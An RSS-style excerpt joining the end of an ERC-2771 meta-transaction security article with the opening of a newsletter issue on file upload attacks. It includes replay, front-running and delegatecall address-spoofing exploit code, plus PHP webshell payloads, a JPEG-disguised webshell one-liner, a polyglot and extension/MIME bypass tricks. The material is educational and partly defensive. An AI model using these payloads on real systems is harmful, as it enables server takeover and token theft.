    let relayerNonce = await provider.getTransactionCount(relayerWallet.address, &apos;latest&apos;);

    // ATTACK: Malicious relayer tries to front-run
    console.log(&apos;⚠️  ATTACK: Relayer tries to front-run by setting their own message first&apos;);
    const maliciousMessage = &apos;Relayer was here - hacked!&apos;;

    try {
        const maliciousTx = await recipient.connect(relayerWallet).setMessage(maliciousMessage, {
            nonce: relayerNonce
        });
        await maliciousTx.wait();
        console.log(&apos;   Relayer set their message:&apos;, maliciousMessage);
        relayerNonce++;  // Increment after first transaction
    } catch (error) {
        console.log(&apos;   Front-run attempt failed:&apos;, error.message);
    }

    // Relayer submits user&apos;s meta-transaction
    console.log(&apos;\nRelayer submits user meta-transaction...&apos;);
    const forwarderWithRelayer = forwarder.connect(relayerWallet);
    const tx = await forwarderWithRelayer.execute(request, signature, {
        gasLimit: 600000,
        nonce: relayerNonce  // Use manually managed nonce
    });
    await tx.wait();
    console.log(&apos;✓ User meta-transaction confirmed\n&apos;);

    // Check final state
    const finalMessage = await recipient.messages(userWallet.address);

    console.log(&apos;=== Results ===&apos;);
    console.log(&apos;Final message:&apos;, finalMessage);
    console.log(&apos;Expected:&apos;, userMessage);
    console.log(&apos;\nFront-run protection:&apos;, finalMessage === userMessage ? &apos;✓ WORKS&apos; : &apos;✗ FAILED&apos;);
    console.log(&apos;\nExplanation:&apos;);
    console.log(&apos;The relayer wrote to messages[relayerAddress] when calling setMessage() directly.&apos;);
    console.log(&apos;The user meta-transaction wrote to messages[userAddress] via _msgSender().&apos;);
    console.log(&apos;These are DIFFERENT storage slots, so no interference occurred.&apos;);
    console.log(&apos;ERC-2771 prevents identity impersonation, not transaction reordering.&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

**Expected Output:**

```
=== Testing Front-Running Protection ===

User wants to set: User message - this is mine!
✓ User signed meta-transaction

⚠️  ATTACK: Relayer tries to front-run by setting their own message first
   Relayer set their message: Relayer was here - hacked!

Relayer submits user meta-transaction...
✓ User meta-transaction confirmed

=== Results ===
Final message: User message - this is mine!
Expected: User message - this is mine!

Front-run protection: ✓ WORKS

Explanation:
The relayer wrote to messages[relayerAddress] when calling setMessage() directly.
The user meta-transaction wrote to messages[userAddress] via _msgSender().
These are DIFFERENT storage slots, so no interference occurred.
ERC-2771 prevents identity impersonation, not transaction reordering.
```

**Key Insight:** ERC-2771 protects against **identity-based front-running** where the relayer tries to impersonate the user. However, it does NOT protect against:

- **Timing-based front-running**: Relayer can still delay or reorder transactions
- **Censorship**: Relayer can refuse to submit certain transactions
- **Global state front-running**: If a function operates on global state (like &quot;first to claim wins&quot;), the relayer can front-run by submitting their own transaction first

For global state operations, you need additional application-level protections like Merkle proofs that bind actions to specific addresses, or commit-reveal schemes.

&lt;/details&gt;

These complete scripts can be run directly after deploying contracts. Each demonstrates a different aspect of meta-transaction behavior and security.

## Security Considerations

Meta-transactions introduce several attack surfaces that don&apos;t exist in standard transactions. Let&apos;s examine each one.

### Nonce Management

Nonces prevent replay attacks. Without them, an attacker could capture a signed meta-transaction and replay it multiple times.

The forwarder maintains a separate nonce counter for each user address.

Here&apos;s how nonce verification works:

![](/content/images/2025/11/nonce-management.svg)

*Nonce management diagram*

The nonce must be incremented before the external call (checks-effects-interactions pattern). If incremented after, a reentrant call could replay the transaction:

```solidity
// VULNERABILITY: Nonce incremented after external call
function execute(ForwardRequest calldata req, bytes calldata sig) external {
    require(verify(req, sig), &quot;Invalid signature&quot;);

    // External call happens first
    (bool success, ) = req.to.call(req.data);

    // VULNERABILITY: Nonce incremented after
    // If req.to is malicious and re-enters, nonce is still the same
    _nonces[req.from]++;
}

// FIX: Increment nonce before external call
function execute(ForwardRequest calldata req, bytes calldata sig) external {
    require(verify(req, sig), &quot;Invalid signature&quot;);

    // FIX: Increment nonce first
    _nonces[req.from]++;

    // Now external call is safe from replay
    (bool success, ) = req.to.call(req.data);
}
```

**Nonce Management on Failure**: If a meta-transaction&apos;s forwarded call reverts, should the nonce still increment?

**OpenZeppelin&apos;s MinimalForwarder approach**: **Yes, always increment**. The nonce increments before the external call, regardless of whether that call succeeds or fails. This prevents a griefing attack where a malicious recipient contract could intentionally revert to block the user&apos;s nonce forever.

This mirrors Ethereum&apos;s account nonce behavior. Once a transaction is included in a block, the nonce increments even if the transaction reverts. The user can then sign a new meta-transaction with the next nonce.

**Alternative approaches** (not recommended): Some implementations allow nonce reuse on failure, but this creates a denial-of-service vector where attackers can block specific users by causing their transactions to fail repeatedly.

**Best Practice**: Always increment nonces before external calls (checks-effects-interactions pattern), regardless of call outcome. This is what our MinimalForwarder implementation does.
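The increment-before-call semantics can be modeled outside the EVM. This is a toy sketch (not real forwarder code; the class and method names are hypothetical) showing that a reverting recipient still consumes the nonce:

```javascript
// Toy model of the forwarder's nonce-on-failure behavior (illustrative only).
class MockForwarder {
    constructor() {
        this.nonces = {};
    }

    getNonce(user) {
        return this.nonces[user] === undefined ? 0 : this.nonces[user];
    }

    execute(req, call) {
        if (req.nonce !== this.getNonce(req.from)) {
            throw new Error('invalid nonce');
        }
        this.nonces[req.from] = req.nonce + 1; // effects: consume the nonce first
        try {
            call();                            // interaction: may "revert"
            return true;
        } catch (e) {
            return false;                      // failed call still consumed the nonce
        }
    }
}
```

Even after a griefing recipient throws, the stored nonce has advanced, so the user simply signs the next request with the next nonce.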

### Replay Across Chains and Forwarders

What if the same forwarder contract is deployed at the same address on multiple chains? An attacker could capture a signed meta-transaction on one chain and replay it on another.

This is why including the `chainId` in the [EIP-712](https://eips.ethereum.org/EIPS/eip-712) domain separator is **mandatory for production applications**. While technically optional according to the EIP-712 specification, omitting chainId creates a cross-chain replay vulnerability.

Always include chainId to bind the signature to a specific chain:

```javascript
// SECURITY: chainId is REQUIRED to prevent cross-chain replay attacks
// Never omit chainId in production applications
const domain = {
    name: &apos;MinimalForwarder&apos;,
    version: &apos;1.0.0&apos;,
    chainId: 1,  // REQUIRED: Ethereum mainnet
    verifyingContract: forwarderAddress
};
```

If an attacker tries to replay the signature on a different chain (e.g., Polygon with chainId 137), the signature verification will fail because the domain separator won&apos;t match.

But what about multiple forwarder contracts on the same chain? If you deploy two forwarder instances, each maintains independent nonces. An attacker could potentially replay a signature across forwarders if the recipient contract trusts both.

The solution is to limit the trusted forwarder to a single address per recipient contract:

```solidity
// SECURE: Only one trusted forwarder
address public immutable trustedForwarder;

// VULNERABILITY: Multiple trusted forwarders create replay risk
mapping(address =&gt; bool) public trustedForwarders;
```

### Front-Running and MEV

As demonstrated in the [front-running test scenario](#scenario-3-test-front-running-protection), ERC-2771 prevents identity impersonation but doesn&apos;t eliminate all front-running risks.

**Key Design Principle:** Avoid global state operations in meta-transaction recipients. Instead, bind actions to specific addresses:

```solidity
// ❌ VULNERABLE: Global state allows relayer front-running
uint256 public itemsRemaining = 100;  // First-come-first-served

// ✅ SECURE: User-specific eligibility
mapping(address =&gt; bool) public canClaim;  // Reserved per address
```

For operations requiring shared state, implement additional protections:
- Merkle proofs binding actions to specific addresses
- Commit-reveal schemes for sensitive operations
- Deadline enforcement to limit timing manipulation windows

### Malicious Relayer Scenarios

A malicious relayer has several options for misbehavior.

**Censorship**: Refuse to submit transactions from certain users. This is hard to prevent without decentralized relayer networks or fallback mechanisms.

**Delay**: Submit transactions only when it benefits the relayer (e.g., wait for gas prices to spike so users see the cost).

**MEV Extraction**: Reorder transactions to extract maximum value, similar to how block builders operate.

**Griefing**: Submit transactions that are designed to fail, wasting the user&apos;s nonce and forcing them to re-sign.

Additional protection can include deadline parameters in custom implementations. However, the standard OpenZeppelin MinimalForwarder doesn&apos;t include deadline checking. Applications can add this as an enhancement or implement off-chain validation to detect and reject stale requests.

## Attack Patterns

Let&apos;s examine specific exploit scenarios that target meta-transaction implementations.

### Attack: Replay Across Relayers

Imagine two relayer services both operating with the same forwarder contract. A user signs a meta-transaction and sends it to Relayer A. An attacker intercepts the signed message and sends it to Relayer B.

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Replay Attack Demonstration&lt;/strong&gt;&lt;/summary&gt;

```javascript
const { ethers } = require(&apos;ethers&apos;);

/**
 * Demonstration of cross-relayer replay attack
 * @notice This shows why nonces are needed
 */
async function replayAttack() {
    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);

    // User signs meta-transaction for RelayerA
    const userWallet = new ethers.Wallet(&apos;USER_PRIVATE_KEY&apos;, provider);
    const forwarderAddress = &apos;0x...&apos;;
    const recipientAddress = &apos;0x...&apos;;  // Recipient contract (placeholder)

    // User creates a signed request
    // Encode deposit() function call
    const recipientInterface = new ethers.Interface([&apos;function deposit() payable&apos;]);
    const depositData = recipientInterface.encodeFunctionData(&apos;deposit&apos;);

    const request = {
        from: userWallet.address,
        to: recipientAddress,  // Recipient contract
        value: 0,  // No ETH transferred in the meta-tx itself
        gas: 500000,
        nonce: 5,  // Current nonce
        data: depositData  // Encoded deposit() call
    };

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: 31337,
        verifyingContract: forwarderAddress
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    const signature = await userWallet.signTypedData(domain, types, request);

    console.log(&apos;User signed meta-transaction&apos;);
    console.log(&apos;Request:&apos;, request);
    console.log(&apos;Signature:&apos;, signature);

    // Attacker intercepts the signed message
    // ATTACK: Try to submit via different relayer

    const relayerAWallet = new ethers.Wallet(&apos;RELAYER_A_KEY&apos;, provider);
    const relayerBWallet = new ethers.Wallet(&apos;RELAYER_B_KEY&apos;, provider);

    const forwarderABI = [
        &apos;function execute((address,address,uint256,uint256,uint256,bytes),bytes) returns (bool, bytes)&apos;
    ];

    const forwarderA = new ethers.Contract(forwarderAddress, forwarderABI, relayerAWallet);
    const forwarderB = new ethers.Contract(forwarderAddress, forwarderABI, relayerBWallet);

    // RelayerA submits first
    console.log(&apos;\nRelayerA submitting...&apos;);
    const txA = await forwarderA.execute(request, signature);
    await txA.wait();
    console.log(&apos;RelayerA succeeded:&apos;, txA.hash);

    // ATTACK: RelayerB tries to replay the same signature
    console.log(&apos;\nAttacker (RelayerB) trying to replay...&apos;);
    try {
        const txB = await forwarderB.execute(request, signature);
        await txB.wait();
        console.log(&apos;VULNERABILITY: Replay succeeded!&apos;);
    } catch (error) {
        // FIX: With proper nonce management, this should fail
        console.log(&apos;FIX: Replay prevented:&apos;, error.message);
        console.log(&apos;Reason: Nonce was incremented after first execution&apos;);
    }
}
```

&lt;/details&gt;

The forwarder&apos;s nonce management prevents this attack. After Relayer A submits the transaction, the nonce increments from 5 to 6. When Relayer B tries to submit the same signature (with nonce 5), verification fails because the expected nonce is now 6.
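A toy version of that check (illustrative only, not EVM code) shows why the replay dies:

```javascript
// Per-user nonce counter mirroring the forwarder's verify() logic.
const nonces = {};

function verifyAndConsume(user, nonce) {
    const expected = nonces[user] === undefined ? 0 : nonces[user];
    if (nonce !== expected) {
        return false;            // stale or future nonce: reject
    }
    nonces[user] = expected + 1; // consume it
    return true;
}
```

With the user at nonce 5, the first submission succeeds and moves the counter to 6; the replayed copy still carries nonce 5 and is rejected.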

### Attack: Nonce Manipulation

What if an attacker can get a user to sign multiple meta-transactions with non-sequential nonces? They could selectively submit them out of order.

```javascript
// User signs three meta-transactions
const tx1 = { ...request, nonce: 10 };  // Deposit 1 ETH
const tx2 = { ...request, nonce: 11 };  // Withdraw 0.5 ETH
const tx3 = { ...request, nonce: 12 };  // Withdraw 0.5 ETH

// User expects order: deposit, withdraw, withdraw
// Attacker submits only tx1 and withholds tx2 and tx3
// Or withholds tx1 entirely, which also blocks tx2 and tx3 (nonces are sequential)
```

The forwarder enforces sequential nonces, but the attacker can still cause denial of service by not submitting transactions. The user must trust the relayer to submit transactions in the order they were signed.

More sophisticated systems use a &quot;queue&quot; nonce system where multiple transactions can be submitted in parallel with dependency chains, but this increases complexity.

### Attack: Recipient Contract Confusion

Using `msg.sender` instead of `_msgSender()` in recipient contracts creates critical vulnerabilities:

```solidity
// ❌ VULNERABLE: Checks relayer&apos;s balance, not user&apos;s
require(balances[msg.sender] &gt;= amount, &quot;Insufficient balance&quot;);

// ✅ SECURE: Checks original user&apos;s balance
require(balances[_msgSender()] &gt;= amount, &quot;Insufficient balance&quot;);
```

**Impact**: User funds become inaccessible, or worse, relayer can access user balances. Audit every function in recipient contracts when retrofitting for meta-transaction support.

### Attack: ERC-2771 + Delegatecall Vulnerability

In December 2023, [OpenZeppelin disclosed a vulnerability](https://www.openzeppelin.com/news/arbitrary-address-spoofing-vulnerability-erc2771context-multicall-public-disclosure) affecting recipient contracts that combine ERC-2771 with Multicall patterns using `delegatecall`. The vulnerability exists entirely in the recipient contract, not the forwarder. An attacker simply sends their own valid meta-transaction with malicious calldata to impersonate any address. No signature interception required.

**Why It Works**: The root cause is a mismatch in how `delegatecall` handles `msg.sender` vs `msg.data`:

| Property | Behavior in delegatecall |
|----------|--------------------------|
| `msg.sender` | **Preserved** (still the forwarder) |
| `msg.data` | **Changed** to the provided calldata |

The `_msgSender()` function checks `msg.sender` to verify the call came from the trusted forwarder, but then reads the address from `msg.data`. Since `delegatecall` preserves `msg.sender` but changes `msg.data`, an attacker can pass the security check while providing a forged address.

```solidity
// VULNERABILITY: ERC-2771 + Multicall with delegatecall
contract VulnerableContract is ERC2771Context {
    // Standard ERC-2771 _msgSender() implementation
    function _msgSender() internal view override returns (address) {
        // ① This check passes because delegatecall preserves msg.sender
        if (isTrustedForwarder(msg.sender)) {
            // ② But msg.data is now the attacker-controlled subcall data
            return address(bytes20(msg.data[msg.data.length - 20:]));
        }
        return msg.sender;
    }

    // VULNERABILITY: Multicall with delegatecall
    function multicall(bytes[] calldata data) external {
        for (uint i = 0; i &lt; data.length; i++) {
            // delegatecall changes msg.data to data[i]
            (bool success, ) = address(this).delegatecall(data[i]);
            require(success, &quot;Multicall failed&quot;);
        }
    }
}
```

**The Attack Step-by-Step**:

1. Attacker creates their own valid meta-transaction (no signature interception needed)
2. The meta-transaction calls `multicall()` with malicious subcall data
3. The malicious subcall has a victim&apos;s address appended at the end

```
Original calldata from forwarder:
┌───────────────────┬─────┬──────────────────────────┐
│ multicall(data[]) │ ... │ ATTACKER_ADDR (20 bytes) │
└───────────────────┴─────┴──────────────────────────┘

Inside delegatecall, msg.data becomes data[i]:
┌──────────────────────┬────────────────────────┐
│ transfer(to, amount) │ VICTIM_ADDR (20 bytes) │
└──────────────────────┴────────────────────────┘
                        ↑ _msgSender() reads THIS
```
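The extraction that makes this work can be reproduced outside the EVM. A sketch of how the `ERC2771Context` pattern parses the claimed sender, i.e. the final 20 bytes of `msg.data` (the calldata values below are made up for illustration):

```javascript
// The claimed sender is the last 20 bytes of msg.data. Under delegatecall,
// msg.data is the attacker-chosen subcall, so whatever address is appended
// there is what the contract trusts.
function extractSender(calldataHex) {
    const hex = calldataHex.replace(/^0x/, '');
    return '0x' + hex.slice(-40); // 20 bytes = 40 hex characters
}

// Attacker appends a victim address to a transfer() subcall:
const victim = 'ab'.repeat(20);                          // hypothetical victim address bytes
const subcall = '0xa9059cbb' + '00'.repeat(64) + victim; // selector + args + forged sender
```

`extractSender(subcall)` returns the victim address, not the attacker who actually signed the outer meta-transaction.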

**Concrete Example**:

```javascript
// Attacker wants to steal tokens from victim
const victimAddress = &quot;0xVICTIM...&quot;;
const attackerAddress = &quot;0xATTACKER...&quot;;

// Craft malicious subcall with victim address appended
const maliciousCall = ethers.solidityPacked(
    [&apos;bytes&apos;, &apos;address&apos;],
    [
        // Function call: transfer tokens to attacker
        contract.interface.encodeFunctionData(&apos;transfer&apos;, [attackerAddress, 1000]),
        // Forged sender address
        victimAddress
    ]
);

// Attacker signs their OWN meta-transaction
const request = {
    from: attackerAddress,
    to: vulnerableContract,
    data: contract.interface.encodeFunctionData(&apos;multicall&apos;, [[maliciousCall]])
};

// Result: Contract transfers tokens FROM victim TO attacker
// The victim never signed anything
```

This vulnerability demonstrates why production systems should use battle-tested forwarder implementations like [`ERC2771Forwarder`](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Forwarder.sol) or [GSN](https://docs.opengsn.org/) rather than minimal custom implementations.

## Key Takeaways

Meta-transactions enable gasless UX but introduce significant security complexity. Here&apos;s a comparison of the trade-offs:

| Aspect | Standard Transaction | Meta-Transaction |
|--------|---------------------|------------------|
| **Gas Payment** | User pays | Relayer pays |
| **UX Barrier** | Requires ETH | No ETH needed |
| **Signature Type** | Transaction signature | Message signature (EIP-712) |
| **Replay Protection** | Account nonce (protocol-level) | Contract nonce (application-level) |
| **Trust Model** | Trustless | Trust relayer for submission |
| **Front-Running Risk** | Public mempool | Relayer can front-run |
| **Censorship Risk** | Network-level only | Relayer can censor |
| **Implementation Complexity** | Simple | Complex (forwarder + recipient) |
| **Audit Surface** | Standard | Larger (nonce, signature, forwarding) |

**Security Checklist for Meta-Transaction Implementations:**

- [ ] Forwarder uses per-user nonces for replay protection
- [ ] Nonces incremented before external calls (checks-effects-interactions)
- [ ] EIP-712 domain includes `chainId` to prevent cross-chain replay (mandatory for production)
- [ ] Deadline parameter enforced to prevent indefinite delays
- [ ] Recipient contracts use `_msgSender()` not `msg.sender`
- [ ] All recipient functions audited for proper sender extraction
- [ ] Signature verification uses EIP-712 typed data (not raw message signing)
- [ ] Gas limits specified in forward requests to prevent griefing
- [ ] **Production-ready forwarder** used (e.g., OpenZeppelin ERC2771Forwarder, not MinimalForwarder)
- [ ] Single trusted forwarder per recipient (not multiple forwarders)
- [ ] **No `delegatecall` in ERC-2771 contracts** or carefully audited if required
- [ ] Multicall patterns don&apos;t use `delegatecall` with user-provided data
- [ ] Application-level checks prevent relayer front-running
- [ ] Relayer service has rate limiting and abuse prevention
- [ ] Users have fallback mechanism if relayer censors them

**When to Use Meta-Transactions:**

Use meta-transactions when onboarding UX is more important than trustlessness. They work well for:
- New user onboarding (free first transactions)
- Sponsored actions (protocol pays gas for specific operations)
- Mobile dApps where users don&apos;t want to manage gas
- Enterprise applications with predictable usage patterns

Avoid meta-transactions when:
- Users are already crypto-native (they have ETH and wallets)
- Trust in relayer is a concern (adversarial environments)
- Transaction ordering is mission-critical (DeFi trading)
- You can&apos;t audit recipient contracts for proper `_msgSender()` usage

**Relayer Centralization Concerns:**

A single relayer service is a point of failure and trust. Decentralized alternatives include:
- **[Gas Station Network (GSN)](https://docs.opengsn.org/)**: Decentralized relayer network with economic incentives
- **[Biconomy](https://docs.biconomy.io/)**: Multi-relayer infrastructure with SLAs
- **Fallback mechanisms**: Allow users to submit transactions directly if relayer fails

The relayer must be monitored for availability, performance, and honest behavior. Service level agreements (SLAs) can help, but ultimately the relayer has significant power over user experience.

## Additional Resources

**Standards and Specifications:**
- [EIP-2771: Secure Protocol for Native Meta-Transactions](https://eips.ethereum.org/EIPS/eip-2771)
- [EIP-712: Typed Structured Data Hashing and Signing](https://eips.ethereum.org/EIPS/eip-712)
- [EIP-2612: Permit Extension for ERC-20](https://eips.ethereum.org/EIPS/eip-2612)

**Implementation Libraries:**
- [OpenZeppelin ERC2771Forwarder](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Forwarder.sol) - Production-ready forwarder with deadline enforcement and batch processing (v5.x)
- [OpenZeppelin MinimalForwarder](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/v4.9.0/contracts/metatx/MinimalForwarder.sol) - Minimal implementation for testing (v4.x, removed in v5)
- [OpenZeppelin ERC2771Context](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/metatx/ERC2771Context.sol) - Helper for recipient contracts

**Meta-Transaction Infrastructure:**
- [Biconomy Documentation](https://docs.biconomy.io/) - Production meta-transaction relayer service
- [Gas Station Network (GSN)](https://docs.opengsn.org/) - Decentralized relayer network
- [Gelato Relay](https://docs.gelato.network/developer-services/relay) - Another relayer service option

**Security Research:**
- [Meta-Transaction Security Considerations](https://docs.openzeppelin.com/contracts/5.x/api/metatx) - OpenZeppelin security docs (v5.x)
- [EIP-2771 Security Audit](https://blog.openzeppelin.com/eip-2771-secure-protocol-for-native-meta-transactions/) - Audit findings and recommendations
- [Arbitrary Address Spoofing: ERC2771Context Multicall Vulnerability](https://www.openzeppelin.com/news/arbitrary-address-spoofing-vulnerability-erc2771context-multicall-public-disclosure) - Critical vulnerability disclosure (December 2023)
- [ERC-2771 Delegatecall Vulnerability](https://docs.gelato.network/web3-services/relay/security-considerations/erc-2771-delegatecall-vulnerability) - Gelato&apos;s security considerations

**Tools:**
- [Foundry](https://getfoundry.sh/) - For testing meta-transaction flows locally
- [Tenderly](https://tenderly.co/) - Transaction simulation and debugging
- [Ethers.js v6 EIP-712 Utilities](https://docs.ethers.org/v6/api/providers/#Signer-signTypedData) - For signing typed data</content:encoded><author>Ruben Santos</author></item><item><title>File Upload Vulnerabilities: From Filter Bypass to Full System Compromise</title><link>https://www.kayssel.com/newsletter/issue-25</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-25</guid><description>How attackers turn innocent file uploads into webshells, arbitrary code execution, and complete server takeovers</description><pubDate>Sun, 23 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

When I was learning web application security and grinding through CTFs (way more than I do now), file upload challenges were everywhere. Every platform had them. TryHackMe, HackTheBox, PortSwigger Labs. And honestly? I loved them.

There&apos;s something satisfying about bypassing a filter that thinks it&apos;s smart. Double extensions, null bytes, polyglot files, magic byte manipulation. Each technique felt like a small puzzle. Upload a webshell, get command execution, game over.

But here&apos;s what makes file uploads so interesting: they&apos;re not just CTF tricks. File upload vulnerabilities are one of the most common paths to RCE in real-world applications. Profile picture uploads, document submission forms, support ticket attachments. Developers implement basic checks, think they&apos;re safe, and move on. Meanwhile, the upload directory is sitting there waiting to execute arbitrary code.

The attack surface is massive. Extension filters, MIME type validation, content checks, magic bytes, storage paths, server configuration. Every layer is an opportunity for bypass. And when you stack techniques together, even well-intentioned defenses fall apart.

The worst part? Developers often focus on preventing malicious file types but forget about where files are stored, how they&apos;re served, or whether the web server will execute them. That&apos;s how innocent profile picture uploads turn into full system compromise.

In this issue, we&apos;ll cover:
- Common file upload vulnerabilities and misconfigurations
- Techniques to bypass extension, MIME type, and content filters
- Weaponizing uploads for webshells and RCE
- Path traversal and file overwrite attacks
- Polyglot files and magic byte manipulation
- Defense strategies that actually work

If you&apos;re pentesting web apps or building upload features, this is essential knowledge.

Let&apos;s break some filters 👇

## 🎯 Why File Uploads Are Dangerous

File upload functionality seems simple. User sends a file, server stores it. But that flow has countless security pitfalls:

**Server-Side Code Execution**: If an attacker can upload executable code (PHP, JSP, ASPX, etc.) and the server runs it, game over. Full RCE.

**Stored XSS**: Upload an HTML or SVG file with embedded JavaScript, and when another user views it, the script executes in their browser.

**Path Traversal**: Manipulate the filename to overwrite critical files like `/etc/passwd`, application configs, or SSH keys.

**DoS via Large Files**: Upload massive files to exhaust disk space or memory.

**Phishing and Social Engineering**: Upload malicious files disguised as legitimate documents for other users to download.

**XXE and Other Parser Bugs**: As we covered in [Issue 22](https://www.kayssel.com/newsletter/issue-22/), XML-based file formats (DOCX, SVG, etc.) can carry XXE payloads.

The most common and impactful? **Remote Code Execution via webshell uploads**. That&apos;s what we&apos;ll focus on here.

## 🔍 Finding File Upload Vulnerabilities

Not every file upload is exploitable, but here&apos;s where to look:

**Profile Pictures and Avatars**: Classic target. Often limited validation, publicly accessible storage.

**Document Uploads**: Resume submission forms, support ticket attachments, invoice uploads. These tend to accept various formats and may be processed server-side.

**File Sharing and Collaboration Tools**: Cloud storage, shared drives, wiki attachments. High-value targets because files are often executable or served with minimal restriction.

**CMS and Admin Panels**: WordPress, Joomla, Drupal media libraries. If you compromise an admin account, file uploads are your fast track to RCE.

**API Endpoints**: Mobile app image uploads, multipart form data endpoints. Sometimes these skip frontend validation entirely.

Look for:
- File upload forms (profile pics, attachments, etc.)
- Multipart form data in requests
- Endpoints that return uploaded file URLs
- Directories like `/uploads/`, `/media/`, `/files/`, `/static/`

## 🧨 Bypassing Extension Filters

The most basic defense is a blacklist or whitelist of allowed file extensions. Attackers bypass these constantly.

### Blacklist Bypass

If the app blocks `.php`, `.jsp`, `.asp`, try:

**Double extensions**:
```
shell.php.jpg
shell.jpg.php
```

Some parsers read the last extension, others the first. If validation checks only the final extension but the server maps the file to a handler based on an earlier one (for example, a misconfigured Apache `AddHandler` directive executes `shell.php.jpg` as PHP), you win.
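
A minimal sketch of that parser/validator mismatch (both checks are hypothetical, not any specific framework):

```python
# Hypothetical filter: validates only the LAST extension.
ALLOWED = {'jpg', 'png', 'gif'}

def filter_ok(filename):
    return filename.rsplit('.', 1)[-1].lower() in ALLOWED

# Hypothetical handler mapping: reacts to ANY recognized extension,
# mimicking a permissive Apache AddHandler-style setup.
EXECUTABLE = {'php', 'phtml'}

def server_executes(filename):
    return any(part in EXECUTABLE for part in filename.lower().split('.')[1:])

print(filter_ok('shell.php.jpg'))        # True  -- passes validation
print(server_executes('shell.php.jpg'))  # True  -- still runs as PHP
```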

**Case variation**:
```
shell.PhP
shell.pHp
```

If the filter is case-sensitive, this works.

**Null byte injection** (older systems):
```
shell.php%00.jpg
```

The null byte (`%00`) terminates the string in some languages, so the server sees `shell.php` but the filter sees `shell.php.jpg`.
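
The mismatch is easy to model: the filter sees the whole string, while a NUL-terminated filesystem API stops at the null byte (sketched below with a string split):

```python
from urllib.parse import unquote

raw = unquote('shell.php%00.jpg')    # decodes to 'shell.php\x00.jpg'

filter_sees = raw                    # validation checks the full string
saved_as = raw.split('\x00')[0]      # a C-style API truncates at NUL

print(filter_sees.endswith('.jpg'))  # True  -- the filter passes it
print(saved_as)                      # shell.php
```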

**Alternative executable extensions**:
```
shell.php3
shell.php4
shell.php5
shell.phtml
shell.phar
```

Apache might execute `.phtml` or `.php5` as PHP depending on configuration.

**Add extra dots or spaces**:
```
shell.php.
shell.php%20
shell.php....jpg
```

Some filesystems strip trailing dots or spaces, turning `shell.php.` into `shell.php` after validation.
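
That validation/storage mismatch can be sketched in a couple of lines; the crude `rstrip` below stands in for the filesystem behavior (notably Windows/NTFS):

```python
def filter_blocks_php(filename):
    # Blacklist check runs on the raw, untouched name
    return not filename.lower().endswith('.php')

def stored_name(filename):
    # Crude model of a filesystem stripping trailing dots and spaces
    return filename.rstrip('. ')

print(filter_blocks_php('shell.php.'))  # True  -- the blacklist lets it through
print(stored_name('shell.php.'))        # shell.php
```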

### Whitelist Bypass

If only `.jpg`, `.png`, `.gif` are allowed:

**Upload a polyglot file** (more on this below) that&apos;s both a valid image and executable code.

**Use allowed extensions with server misconfiguration**: Upload `shell.jpg` but configure the server (via `.htaccess` if writable) to execute `.jpg` as PHP:

```apache
AddType application/x-httpd-php .jpg
```

If you can upload `.htaccess` files, you control execution.

**Content-Type manipulation**: The client sends a `Content-Type` header. Change it to match expectations:

```http
Content-Type: image/jpeg
```

Even if the file is actually a PHP script, the server might trust the header.

## 🎭 Bypassing MIME Type Validation

Some apps validate the `Content-Type` header sent by the client. This is trivial to bypass.

**Intercept the upload request with Burp Suite and modify the header**:

```http
POST /upload HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;shell.php&quot;
Content-Type: image/jpeg

&lt;?php system($_GET[&apos;cmd&apos;]); ?&gt;
------WebKitFormBoundary--
```

The server sees `Content-Type: image/jpeg` and allows the upload, but the file is a PHP webshell.

**Key point**: Never trust client-controlled headers. Always validate file content server-side.

## 🧬 Magic Bytes and File Signature Bypass

Smarter defenses check the file&apos;s magic bytes (the first few bytes that identify file types). For example:

- **JPEG**: `FF D8 FF`
- **PNG**: `89 50 4E 47`
- **GIF**: `47 49 46 38`
- **PDF**: `25 50 44 46`

If the app checks magic bytes, prepend them to your payload.

&lt;details&gt;
&lt;summary&gt;Create a PHP webshell disguised as a JPEG:&lt;/summary&gt;

```bash
echo -e &apos;\xFF\xD8\xFF\xE0&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&apos; &gt; shell.php.jpg
```

The file starts with `FF D8 FF E0` (JPEG magic bytes) and passes the check; PHP emits the leading binary bytes as raw output and still executes the embedded code.

&lt;/details&gt;
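
Why prepending works: a naive signature check inspects only the leading bytes, so everything after the magic bytes is invisible to it. A sketch (with a harmless placeholder standing in for the real PHP payload):

```python
JPEG_MAGIC = b'\xff\xd8\xff'

def looks_like_jpeg(data):
    # Naive server-side check: trusts the first bytes only
    return data.startswith(JPEG_MAGIC)

payload = JPEG_MAGIC + b'\xe0' + b'...php payload would go here...'
print(looks_like_jpeg(payload))  # True -- the disguised file passes
```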

**Polyglot Files**: Files that are valid in multiple formats simultaneously. For example, a file whose `GIF89a` header makes it both a valid GIF and valid JavaScript, while the comment smuggles a PHP payload:

```javascript
GIF89a/*&lt;?php system($_GET[&apos;cmd&apos;]); ?&gt;*/=1;
```

When parsed as GIF, it&apos;s valid. When parsed as PHP, it executes. These are gold for bypassing multi-layered validation.

Tools like **[Mitra](https://github.com/corkami/mitra)** can generate polyglot files, and the **[ImageTragick PoCs](https://imagetragick.com/)** show how malicious images exploit processing libraries.

## 🚀 Weaponizing File Uploads for RCE

Once you&apos;ve bypassed filters and uploaded executable code, you need to trigger execution.

### Classic Webshells

A minimal PHP webshell:

```php
